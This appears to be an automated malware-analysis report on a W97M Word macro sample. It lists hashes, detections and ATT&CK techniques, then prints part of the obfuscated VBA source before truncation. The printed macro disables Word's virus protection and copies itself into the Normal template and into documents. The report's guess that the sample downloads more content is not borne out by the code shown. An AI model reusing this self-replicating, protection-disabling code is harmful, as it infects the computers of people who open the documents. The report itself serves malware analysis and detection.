W97M — Office (OLE) malware analysis

Static analysis result for SHA-256 03d3eafe154fffa3…

MALICIOUS

Office (OLE)

67.4 KB Created: 2000-04-03 08:57:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 294f69f356b13247a2758ffac5a0dcab SHA-1: 5a3bb487367228992aeec027a3b36415ea107b23 SHA-256: 03d3eafe154fffa329ac3f305730a0b0569b1b274dc9c2181cc90c530f7c6337
120 Risk Score

Malware Insights

W97M · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro that is automatically executed upon opening the document, as indicated by the Document_Open macro firing. The ClamAV detection name 'Win.Trojan.W97M-8' strongly suggests this is a macro-based malware dropper. The VBA code itself appears heavily obfuscated, but its presence and the heuristic firings confirm the malicious intent to execute arbitrary code, likely for downloading further malicious content.

Heuristics 3

  • ClamAV: Win.Trojan.W97M-8 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.W97M-8
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 83337 bytes
SHA-256: b6b060583bed0b013dd0c28257b6c1939cb02fcf6b7c259584d3667707a01030
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
ºž¦øŒûŠÝ‘ªŠ§ºÞ—�Ýúø¦ª…Ì¡ÀÏ’�ÈÑ÷›¶®Ê£øˆœØ = "òßí¾˜¢®–†¾Ýåê"
¡áôÈ÷ëšß±�œ““«çè¤Â͆È⛋¯Êæï«Â�ÃÙ¹ = "­¡„¨¥‘ù�­”Åð"
×Ö¤žªÑ¶�ß’Ë´°À„º ²Œæ°Øäœê©ÐÆÄ©¥¿Å¹Õ™©‘† = "®Ï†‡¥Ö­½›˜è²Ýðæë¯"
ÔÑ…ÂÅ™Üã½�áŸú—™£Ä©Ýä‡Öæ§ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúŒã«òÑâ¨ð˜ = "¼±»ã©—îò¹¡â¦–Ì"
ޣل⿈�²„Œè¯çŠ°®¦ßŠ«§Ï›âÕʆ¼ìÍÐÏ = "ˉ­È›ê‹‡ðݼ¯�ŠàÁ Ò"
Ë㧓ÜÖ“Ìç—¬¸Ÿ…š˜›�⿺˜ô짙ÜÓɨ޿ = "®§Éá„Â"
È­úôªòÎú¸À‹ÞˆÊ™»×»ìéɸ Ö”úù™›æ󪊼©ÒըЄóàŒ”œ‰èõáÔ™§±¸ = "ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆Æèѽ®…ñµ�ÖÖ"
¦‚ŠÁêɦµÙ­¿ ò¤çïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¬ÁÚ†¿èòÇ’‚ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú너䕅±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ„Ô݉™¯Õè´ÓÖ±¤ = "àßÓ×›Â�½±„„“�Ê�"
¬Ôžºæ¹„À�ó”°µ™ñփׇτ‚õí�ÊÔžºæ¹„À�ó”°µ™ñփׇτ‚õí“‘»£ðÂƤ”Ì‹ÈàÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú‚Î…Ö¼âŸÎ�¡¤¾šÉ¡ä̛Ŧ˭é = "”ëˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúÅò"
Çôû«åÔšÅÇÉìÀ¼¡ÃË´�ÀšŸªÈØÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú®½Úá°”¾ÛšÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúÞÅ”ÏÁÅ� = "íéæùÊ›À‘„Ù»ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúã"
ª”ßÒ�˨ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑáÑŸúť䉵鹇‡‹¾Á‡½¼Ú‚¦ = "²�Ѳ‚–ܡ츔½ÏÓÔžºæ¹„À�ó”°µ™ñփׇτ‚õíÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú"
Эäǯ¾ïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú�…Óîˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆Æèч£¥ƒˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÕ×½¸ÊÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúï® = "�ºÙª"
ß‹È®‚Î…Ö¼âŸÎÏŠøô†ÌŸ¡¾¹ùŠˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ™Ýà–ß݃ӉÝç„…ì½àë = "»ïˆ˜®Ëð©ƒ�¯§�£Ô"
’èГ†ùàÆ�’›…„§¯®»½éº = "¡›ê­´ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆Æèѹó‹™×ï²ðˆ"
ÇéÛêÝô¨í‚¸ô‡ËÆèç¹Ù�êۈ䕅±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÒ쵚„Þ = "ƒÞ‡á±¥ª"
ƒÛÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†ö½½öù–‚Î…Ö¼âŸÎ‚Î…Ö¼âŸÎ¼ÚìÜèÈéµùÌÛ–ò”Ä = "§‚Î…Ö¼âŸÎ“ö•éצµ¾„§®ë"
ƒÛÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†ö½½öù–‚Î…Ö¼âŸÎ‚Î…Ö¼âŸÎ¼ÚìÜèÈéµÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†ÚôÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†Þ¨è¸–ÐÔžºæ¹„À�ó”°µ™ñփׇτ‚õíòÙ = "¦ÜßçÅÀÏ‘¯�¨Ë�"
Ýå ‚Î…Ö¼âŸÎê«à˜°ÈÉïˆÍž•ó‘ò’¼Ïëˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèѪʈ䕅±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèѺ¬ªÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†‚ëظÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúµÙ¢Éó Žð臽¿‹Œ×ê÷•¨ = "�×Ö¤žªÑ¶�ߒ˘°êÂÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúâÞߨë‰É¢ãã¡æÔžºæ¹„À�ó”°µ™ñփׇτ‚õíÎãŒÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúìÙÍ­¢¹ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑêæÆ¡Û"
ƒÛÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†ö½½öù–‚Î…Ö¼âŸÎ‚Î…Ö¼âŸÎ¼ÚìÜèÈéµÆ¨åÚ¥ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†¢Ôº‚Î…Ö¼âŸÎï  = "´˜ÄÔžºæ¹„À�ó”°µ™ñփׇτ‚õíŸÂõ§ö¢ïç"
ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ = ActiveDocument.VBProject.VBComponents(1).CodeModule.countoflines
ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú = NormalTemplate.VBProject.VBComponents(1).CodeModule.countoflines
Application.Options.VirusProtection = False
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.SaveNormalPrompt = False
If ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ > 169 And ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú > 169 Then Exit Sub
If ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú > 169 Then
Set ó Žð臽¿‹Œ×ê÷• = ActiveDocument
Set ø†½É²ôîò�¹à¢…õ¬úæ»úÀº¢ = NormalTemplate
GoTo •à˜°ÈÉïˆÍž•ó‘ò’¼ÏëʨĠÖÌÓÙ£¡µˆ­ÁÀÒ駒렱å
End If
If ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú < 170 Then
Set ó Žð臽¿‹Œ×ê÷• = NormalTemplate
Set ø†½É²ôîò�¹à¢…õ¬úæ»úÀº¢ = ActiveDocument
End If
ReDim ÖÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†¦šˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèѾÆëÝ泈³–¦Ôžºæ¹„À�ó”°µ™ñփׇτ‚õí“ð¥ÅÅéß­(50, 50)
‚Î…Ö¼âŸÎ = ø†½É²ôîò�¹à¢…õ¬úæ»úÀº¢.VBProject.VBComponents(1).CodeModule.countoflines
ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ = 0
Do Until ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ = ‚Î…Ö¼âŸÎ
ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ = ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ + 1
Эäǯ¾ïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú�…ÓîÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†‡£¥ƒˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÕ×½¸ = ø†½É²ôîò�¹à¢…õ¬úæ»úÀº¢.VBProject.VBComponents(1).CodeModule.Lines(ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ, 1)
If Left(Эäǯ¾ïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú�…ÓîÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†‡£¥ƒˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÕ×½¸, 1) = "'" Then
èêÀ = Len(Эäǯ¾ïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú�…ÓîÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†‡£¥ƒˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÕ×½¸)
Эäǯ¾ïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú�…ÓîÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†‡£¥ƒˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÕ×½¸ = Mid(Эäǯ¾ïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú�…ÓîÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†‡£¥ƒˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÕ×½¸, 2, èêÀ)
™Ý¾õˆä•…
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.